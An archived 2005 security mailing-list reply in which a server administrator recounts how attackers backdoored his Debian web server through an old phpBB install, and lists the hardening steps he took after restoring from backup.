Re: backdoor named tvic / Kayten / ttyshd download in apache logfile

• Previous message: Anne & Lynn Wheeler: "Re: Good passwords and security priorities"
• In reply to: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Next in thread: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Reply: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 26 Apr 2005 01:51:18 -0700

> Downloaded both of them for analysis.
Thank you.
> If this is the case your system might in real trouble.
Yes it is/was. The ttyshd opened a telnet account for them.
They managed to gain root access! But i wonder how. It is an debian
testing with apt-get upgrade only 2 days before the attack. And their
telnet shell ran as user www-data.
They replaced the ssh daemon and the log/network daemons. With the ssh
daemon they could read the root pw from me. They installed an
IRC-BotNet Client to controll the server and another qmail for
spamming.
They don't touched my IP Accounting so i know that 2-3 GB of traffic
was produced.
They did no more damage because they wanted to have this PC in their
botnet?

Luckily i made a backup 2 days before the attack. I reinstalled the
system.
(I couldn't trust any file on the server anymore)

> Do you have any cgi script running on your webserver?
Yes some cgi and php. I think they used a 'code inejction' on an old
phpBB install of a customer.

I secured the system now. PhP in safe-mode without
"exec/system/passthru" calls.
Programs like wget/ftp/chmod ... are only accessible from members of
"users".
No direct root-ssh. Most cgi-bin ScripAliases are disabled until i
know all scripts running.

They tried to log in per ssh a few times. But it stopped since
yesterday.

Cheers

Henning

• Previous message: Anne & Lynn Wheeler: "Re: Good passwords and security priorities"
• In reply to: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Next in thread: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Reply: Chris Kronberg: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: Me again... :-) ... >> Thomas Sapp ... but SSH instead to remotely login. ... >Use a finger daemon only if you really need to. ... And I am aware of the xinet.d files and the telnet file listed there is ... (Fedora) RE: Commentary on the seven words ... When I was an operating systems programmer we all too often forgot that the Operating system existed to support the application, not the other way around. ... A Because the application that we run uses a telnet client that doesn't support ssh - and that's why I can't run ssh on this system. ... I administrate one system that has 128 clients on it and it's ... (RedHat) Re: Commentary on the seven words ... A Because the application that we run uses a telnet client that doesn't ... support ssh - and that's why I can't run ssh on this system. ... General Red Hat Linux discussion list ... >operating system and utility advice and assistance and there are SEVEN ... (RedHat) Re: Commentary on the seven words ... routinely asked to help with enabling rsh and telnet. ... Shoot, I use SSH & all that, but if I wanted to allow it for some ... > I wrote in with a complaint that Linux will allow a process (like Tar, ... I administrate one system that has 128 clients ... (RedHat) Re: OSR507: xm_vtcld : could not open libXm.so ... laptop, I can run successfully "scoadmin software" if I'm through SSH, ... LINUXLAPTOP $ telnet 172.xxx.101.66 ... Similarly cron jobs have a different environment, and cgi-bin scripts ... (comp.unix.sco.misc)